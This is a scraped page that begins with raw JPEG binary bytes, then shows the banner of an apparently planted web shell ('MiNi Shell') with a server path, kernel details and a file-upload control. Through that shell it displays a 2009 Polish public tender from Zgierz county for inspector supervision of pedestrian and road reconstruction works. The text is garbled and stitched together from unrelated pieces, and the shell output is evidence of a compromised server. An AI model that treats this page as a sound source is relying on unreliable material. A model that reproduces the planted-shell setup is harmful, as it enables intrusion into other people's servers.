JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090902/303098-N-2009.html

<p class="kh_header"><b>Zgierz: Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn. Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5110E/5112 E w m. Koźle., nad zadaniem pn.  Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5112 e w m. Tymianka. oraz nad zadaniem pn. Przebudowa drogi gruntowej Głowno-Helenów, gm. Głowno. - trzy zadania</b><br>
<b>Numer ogłoszenia: 303098 - 2009; data zamieszczenia: 02.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Zgierskiego , ul. Sadowa 6A, 95-100 Zgierz, woj. łódzkie, tel. 042 7190885, faks 042 7190816.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn. Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5110E/5112 E w m. Koźle., nad zadaniem pn.  Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5112 e w m. Tymianka. oraz nad zadaniem pn. Przebudowa drogi gruntowej Głowno-Helenów, gm. Głowno. - trzy zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru nad zadaniem pn Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5110E/5112 E w m. Koźle., nad zadaniem pn. Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5112 e w m. Tymianka. oraz nad zadaniem pn. Przebudowa drogi gruntowej Głowno-Helenów, gm. Głowno. - trzy zadania.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości:
1)80, 00 zł ( słownie : osiemdziesiąt złotych) - dla zadania Nr 1
2)120,00 zł ( słownie: sto dwadzieścia złotych)- dla zadania Nr 2
3)400,00 zł ( słownie: czterysta złotych ) - dla zadania Nr 3<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 4.1. Posiadają uprawnienie do wykonywania określonej działalności  lub czynności  jeżeli ustawy nakładają obowiązek posiadania takich uprawnień i są uprawnienie do prowadzenia działalności  gospodarczej zgodnie z art. 14 ust. 1 ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej ( Dz. U. z 2007 r. Nr 155, poz. 1095 )  
4.2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia. 1) Wykonawca musi wykazać, iż w okresie ostatnich 3 latach przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zrealizował co najmniej 2 zamówienia polegające na wykonaniu funkcji inspektora nadzoru robót drogowych o wartości minimum: 
1)dla zadania Nr 1 -  3 600 zł brutto - każda,
2)dla zadania Nr 2 -  5 100 zł brutto - każda,
3)dla zadania Nr 1 -  20 000 zł brutto - każda,
2) Wykonawca musi wykazać, iż dysponuje osobami: które będą wykonywać zamówienie, posiadającymi uprawnienia do nadzorowania i kierowania robotami budowlanymi w specjalności konstrukcyjno-inżynieryjnej w zakresie budowy dróg - minimum 1 osoba; Do wykazu należy załączyć dokumenty stwierdzające, że wskazane przez Wykonawcę osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają uprawnienia budowlane  - drogowe w specjalności konstrukcyjno - inżynieryjnej 
w zakresie budowy dróg (zgodnie z art. 12 ust. 1 i 2 ustawy - Prawo budowlane)wystawione przez podmioty uprawnione  oraz aktualne zaświadczenie o przynależności tych osób do Okręgowej Izby Inżynierów Budowlanych.
1.1.1	
4.3. Znajdują się w sytuacji ekonomicznej 
i finansowej zapewniającej wykonanie zamówienia.
4.4. Nie podlegają wykluczeniu z postępowania.
Ocena spełnienia warunków udziału w Postępowaniu zostanie dokonana metodą spełnia/nie spełnia na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń składających się na ofertę, wg wymogów zawartych w pkt 10 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 4.1.1.  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert*.
4.1.2.  Oświadczenie o spełnianiu warunków udziału 
w postępowaniu (Zał. Nr 3)**.
4.2.1.Wykaz wykonanych lub wykonywanych usług  w okresie ostatnich 3 latach  lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich  wartości, przedmiotu, dat wykonania i miejsca wykonania oraz załączeniem dokumentów (np. referencje, protokoły odbioru) potwierdzających, że  dostawy te zostały wykonane należycie (Zał. Nr 4A, 4B, 4C). W przypadku załażenia dokumentów potwierdzających posiadanie doświadczenia przez  Wykonawcę nabytego w skutek uczestnictwa w konsorcjum należy wskazać w wykazie  za jaką części robót lub w jakim zakresie uczestniczył Wykonawca.
UWAGA: Wykonawcy oferujący wykonanie zadania Nr 1, Nr 2, Nr 3  opracowują przedmiotowy załącznik odrębnie dla każdego zadania
4.2.2.	Wykaz osób uczestniczących 
w wykonywaniu zamówienia którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności.
UWAGA: Wykonawcy oferujący wykonanie zadania Nr 1, Nr 2, Nr 3  opracowują przedmiotowy załącznik odrębnie dla każdego zadania.
4.2.3.Oświadczenie osoby uprawnionej do pełnienia samodzielnych funkcji w budownictwie o podjęciu się obowiązków kierownika budowy wraz z dokumentami potwierdzającymi nabycie uprawnień w wymaganej przez Zamawiającego specjalności wydanymi przez organ do tego uprawniony- ( załącznik nr 5 A,5 B, 5 C) do SIWZ, oraz posiada aktualne zaświadczenie o przynależności tych osób do właściwej izby samorządu zawodowego.
4.2.4Oświadczenie o spełnianiu warunków udziału w postępowaniu (Zał. Nr 3).
4.3.1.  Oświadczenie o spełnianiu warunków udziału 
w postępowaniu (Zał. Nr 3).
4.4.1.  Oświadczenie o spełnianiu warunków udziału 
w postępowaniu (Zał. Nr 3).
* - Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast przedmiotowych dokumentów, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono jego upadłości,
b)nie zalega z uiszczaniem podatków, opłat oraz składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Dokumenty, o których mowa w a i c., powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, lit. b nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli             w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
** Oświadczenie o spełnianiu warunków udziału w postępowaniu - wykonawca składa tylko jedno oświadczenie na potwierdzenie każdego warunku..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.starostwo.zgierz.pl/przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia - SIWZ (cena 13,00 zł) można odebrać w siedzibie Zamawiającego w Starostwie Powiatowym w Zgierzu przy ul. Sadowej 6A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2009 godzina 11:00, miejsce: Oferty należy składać w Starostwie Powiatowym w Zgierzu; 95-100 Zgierz, ul. Sadowa 6A w pok. 112 - Kancelaria- nie później niż do dnia 10 września  2009 r. do godz. 11:00..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn.  Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5110E/5112 E w m. Koźle..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są roboty budowlane obejmujące przebudowę  ciągu pieszego  w pasie drogi powiatowej Nr 5110 E/ 5112 E w m. Koźle. W skład robót wchodzą roboty budowlane polegające m. in. na:
a)wykonaniu i odbiorze robót związanych z ustawieniem krawężników betonowych wystających o wymiarach  100 x 15 x 30 cm z wykonaniem ław betonowych z oporem, na podsypce cementowo - piaskowej, na długości 400,00 m, w pasie drogi powiatowej Nr 5110 E i Nr 5112 E w m. Koźle, gm. Stryków.
b) wykonaniu i odbiorze robót związanych z wykonaniem i wyprofilowaniem koryta, na chodnikach,  oraz  na zjazdach na powierzchni 680,00 m2 , w pasie drogowym drogi powiatowej Nr 5110 E i Nr 5112 E  w m. Koźle, gm. Stryków.
c) wykonaniu i odbiorze robót związanych z ustawieniem betonowego obrzeża chodnikowego wymiarach  100 x 30 x 8 cm na podsypce cementowo piaskowej z wypełnieniem spoin piaskiem, na długości 464,00 m, w pasie drogowym drogi powiatowej Nr 5110 E i Nr 5112 E  w m. Koźle, gm. Stryków.
d)wykonaniu i odbiorze robót, związanych z wykonaniem nawierzchni z brukowej kostki betonowej grubości 6 cm, kolorowej, na podsypce cementowo - piaskowej, z wypełnieniem spoin piaskiem, na chodniku,  na powierzchni 625,00 m2, w pasie drogowym drogi powiatowej Nr 5110 E i Nr 5112 E w m. Koźle,  gm. Stryków.
e)wykonaniu i odbiorze robót związanych z wykonywaniem podbudowy  z kruszywa łamanego stabilizowanego mechanicznie gr. 15 cm na zjazdach na powierzchni 55,50 m2, w pasie drogowym drogi powiatowej Nr 5110 E i Nr 5112 E  w m. Koźle, gm. Stryków.
f)wykonaniu i odbiorze robót związanych z wykonaniem wjazdów i wyjazdów z bram z kostki brukowej betonowej, kolorowej, gr. 8 cm na podsypce cementowo - paskowej z wypełnieniem spoin piaskiem,  na powierzchni 55,50 m2, w pasie drogowym drogi powiatowej Nr 5110 E i Nr 5112 E  w m. Koźle,  gm. Stryków.
2.Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia opisanego w pkt II. 1. zawarte są w:
Ogólnych Specyfikacjach Technicznych:
a)OST- Wymagania ogólne D - M - 00.00.00
b)OST- Remont cząstkowy nawierzchni bitumicznych D- 05.03.17,
c)OST- Rozbiórka elementów dróg, ogrodzeń i przepustów D-01.02.04,
d)OST -Krawężniki betonowe D-08.01.01,
e)OST- Koryto  wraz  z  profilowaniem i  zagęszczaniem  podłoża D-04.01.01 
f)OST - Betonowe  obrzeża  chodnikowe D - 08.03.01
g)OST - Chodniki D - 08.02.00,
h)OST- Podbudowy  z  kruszywa stabilizowanego  mechanicznie D - 04.04.00 ¸ 0404.03
i)OST- Wjazdy  i  wyjazdy  z  bram D - 08.04.01
Szczegółowych Specyfikacjach technicznych:
a)SST-1- Krawężniki betonowe D-08.01.01,
b)SST-4- Koryto wraz z profilowaniem i zagęszczaniem podłoża D-L-04.01.01,
c)SST-5- Betonowe obrzeża chodnikowe D-08.03.01,
d)SST-6- Chodniki z brukowej kostki betonowej D-08.02.02,
e)SST-7 -Podbudowa z kruszywa łamanego stabilizowanego mechanicznie D-04.04.02,
f)SST-8- Wjazdy i wyjazdy z bram D - 08.04.01
Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi, lub w siedzibie Zamawiającego pok. 307,309
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
1.Wykonawca zobowiązany jest do: 
1)udziału w czynnościach przekazania wykonawcy Inwestycji terenu inwestorskich;
2)Zakres podstawowych obowiązków i praw inspektora nadzoru wynika           z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz.U.            z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
a)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową
 i pozwoleniem budowlanym, obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
b)uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów i urządzeń,  zgłaszanych przez wykonawcę robót, szczególnie w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
c)sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a  w szczególności zapobieganie zastosowaniu wyrobów
 i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
d)sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
e)przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział             w czynnościach odbioru robót,
f)potwierdzanie ilości wykonanych robót,
g)potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
h)sprawdzanie rozliczeń Wykonawcy robót budowlanych i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
i)uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
j)inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
3)udział w naradach technicznych zwoływanych przez Zamawiającego lub Wykonawcę robót budowlanych.
2.Zamawiający wymaga, aby Wykonawca był przedsiębiorcą                            w rozumieniu przepisów ustawy z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
3.Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane.
4.Zleceniobiorca ponosi odpowiedzialność za szkody wyrządzone na skutek nie wykonania lub nienależytego wykonania czynności objętych umową, ocenianego w granicach przewidzianych dla umów starannego działania.
5.Termin realizacji inwestycji 40 dni od dnia przekazania terenu.
6.Okres gwarancji na wykonane prace 24 miesiące..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn.  Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5112 e w m. Tymianka..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka nadzorowanej inwestycji:
1.Przedmiotem zamówienia jest robota budowlana polegająca na przebudowie ciągu pieszego w pasie drogi powiatowej Nr 5112 E w m. Tymianka CPV. 45233260-9, 45233262-3,
2.Realizacja przedmiotu zamówienia obejmuje :
1)wykonanie krawężników betonowych wystających o wymiarach 15x 30 cmz wykonaniem ław betonowych z oporem, na podsypce cementowo - piaskowej,
2)mechaniczne wykonanie koryt gł. 20 cm na gruncie kat. II - VI na całej szerokości chodników i zjazdów,
3)profilowanie i zagęszczenie podłoża wykonywane mechanicznie, pod warstwy konstrukcyjne nawierzchni,
4)roboty ziemne wykonywane koparkami przedsiębiernymi,
5)transport ziemi samochodem samowyładowczym,
6)wykonanie obrzeży betonowych o wymiarach 30x8 cm na podsypce cementowo - piaskowej, spoiny wypełnione zaprawą cementową, obramowanie zjazdów,
7)wykonanie chodników z płyt betonowych 50x 50 x7 cm na podsypce piaskowej z wypełnieniem spoin piaskiem,
8)wykonanie warstwy górnej podbudowy z kruszyw łamanych gr. 15 cm,
9)wykonanie nawierzchni z kostki brukowej betonowej, kolorowej grubości 8 cm, na podsypce cementowo - piaskowej,
10) plantowanie poboczy wzdłuż chodnika,
11)Uzupełnienie szczeliny między krawężnikiem, a jezdnią mieszanką mineralno - asfaltową, z obcięciem krawędzi piła mechaniczną.
3.Wymagania szczegółowe dotyczące wykonania i odbioru robót objętych przedmiotem zamówienia zawarte są w: 
1)Ogólnych Specyfikacjach Technicznych (OST) D-00.00.00. Wymagania ogólne, 
2)Ogólnych Specyfikacjach Technicznych (OST) D-08.04.01 Wjazdy i zjazdy z bram, 
3)Ogólnych Specyfikacjach Technicznych (OST) D-05.03.17 Remont cząstkowy nawierzchni bitumicznych
4)Ogólnych Specyfikacjach Technicznych (OST) D-04.04.00-04.04.03.Podbudowy z kruszywa stabilizowanego mechanicznie, 
5)Ogólnych Specyfikacjach Technicznych (0ST) D-08.03.01 Betonowe obrzeża chodnikowe, 
6)Ogólnych Specyfikacjach Technicznych (OST) D-04.01.01 Koryto wraz z profilowaniem i zagęszczeniem podłoża, 
7)Ogólnych Specyfikacjach Technicznych (OST) D-08.02.00 Chodniki,
8)zczegółowych Specyfikacjach Technicznych (SST) D-08.04.01 Wjazdy i wyjazdy z bram,
9)Szczegółowych Specyfikacjach Technicznych (SST) D-04.04.02 Podbudowa z kruszywa łamanego stabilizowanego mechanicznie,
10)Szczegółowych Specyfikacjach Technicznych (SST) D-08.02.01 Chodnik z płyt chodnikowych betonowych
11)Szczegółowych Specyfikacjach Technicznych (SST) D-08.03.01 Betonowe obrzeża chodnikowe, 
12)Szczegółowych Specyfikacjach Technicznych (SST) D-L 04.01.01 Koryto wraz z profilowaniem i zagęszczaniem podłoża, 
13)Szczegółowych Specyfikacjach Technicznych (SST) D-08.01.01. Krawężniki betonowe,
4.Zamawiający wymaga, aby Wykonawca udzielił 36 miesięcznej gwarancji jakości na roboty objęte przedmiotem zamówienia.
5.Zamawiający wymaga, aby Wykonawca rozszerzył odpowiedzialność z tytułu rękojmi za wady na okres 36 miesięcy.
6.Termin wykonania inwestycji 60 dni kalendarzowych od dnia przekazania Wykonawcy terenu budowy.
Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi. lub w siedzibie Zamawiającego pok. 307,309
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
Zakres podstawowych obowiązków i praw inspektora nadzoru wynika 
z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. Z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
1)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
2)uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów 
3)urządzeń, zgłaszanych przez wykonawcę robót, szczególnie 
w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
4)sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a w szczególności zapobieganie zastosowaniu wyrobów i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
5)sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
6)przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział 
w czynnościach odbioru robót,
7)potwierdzanie ilości wykonanych robót,
8)potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
9)sprawdzanie rozliczeń Wykonawcy robót budowlanych 
i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
10)uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
11)inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
Zamawiający wymaga, aby Wykonawca był przedsiębiorcą w rozumieniu przepisów ustawy  z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
